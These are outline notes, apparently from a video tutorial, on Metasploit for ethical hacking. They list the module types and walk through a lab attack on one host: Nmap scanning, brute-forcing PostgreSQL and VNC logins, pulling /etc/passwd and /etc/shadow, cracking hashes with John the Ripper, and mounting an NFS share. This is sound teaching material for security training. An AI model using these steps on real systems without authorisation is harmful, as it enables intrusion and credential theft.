Metasploit in Ethical Hacking

Jul 15, 2024

Metasploit in Ethical Hacking

Introduction

  • Overview of Metasploit and its uses in ethical hacking.
  • Quick overview of Metasploit modules.
  • Walkthrough of exploiting vulnerabilities using Metasploit.
  • Other tools mentioned: Nmap, John the Ripper.

Starting Metasploit

  • Command to start Metasploit: sudo msfconsole
  • Loading process involves St inits framework and various outputs.

Metasploit Modules

  • Exploit Module:
    • ~2500 modules.
    • Used to exploit vulnerabilities in target systems.
    • Targets software vulnerabilities, weak configurations, weak or no passwords.
  • Payload Module:
    • Sets of malicious code for reverse shells, establishing connections, persistence, etc.
  • Auxiliary Module:
    • Provides additional functionality like scanning, fingerprinting, information gathering.
  • Encoders:
    • Converts code or information.
  • Evasion:
    • Modifies payloads to evade antivirus and firewalls.
  • Post Module:
    • Used post-exploitation to test security controls and perform actions like privilege escalation, data exfiltration.
  • No Ops:
    • Keeps remote connection open after exploit execution.

Key Modules to Focus On

  • Exploit
  • Payloads
  • Auxiliary
  • Post

Locating Metasploit Modules

  • Path: /usr/share/metasploit-framework/modules
  • Navigation example: cd /usr/share/metasploit-framework/modules/exploits/windows/smb

Nmap Scan

  • Determine IP address and network range: ifconfig, ip route
  • Quick Nmap scan: nmap -sF 10.0.2.0/24
  • Detailed scan for versions and vulnerabilities: nmap -sS -sV 10.0.2.13

Exploiting PostgreSQL Database

  • Check for default database names: template1 and template0
  • Brute force login: auxiliary/scanner/postgres/postgres_login
  • Modules found: auxiliary/scanner/postgres/postgres_login, auxiliary/scanner/postgres/postgres_sqli
  • Retrieving the list of databases: set SQL select datname from pg_database
  • Extracting sensitive files like /etc/passwd and /etc/shadow

Cracking Passwords

  • Using John the Ripper within Metasploit: john pay_to_win.txt
  • Verify cracked passwords by logging in via Telnet.

VNC Exploit

  • Find VNC module: search vnc
  • Brute force VNC login: auxiliary/scanner/vnc/vnc_login
  • Logging in with VNC Viewer using cracked password.

NFS Exploit

  • Find and use NFS module: auxiliary/scanner/nfs/nfsmount
  • Mount the NFS share: mount -o nolock 10.0.2.13:/ /mnt/hackme
  • Browse mounted filesystem and access sensitive files.

Final Notes

  • Modules used: Exploit, Auxiliary, Post.
  • Future plans for in-depth exploration of each module.

Conclusion

  • Like, subscribe, and share for more content.

Notes provided by Neelson Networking.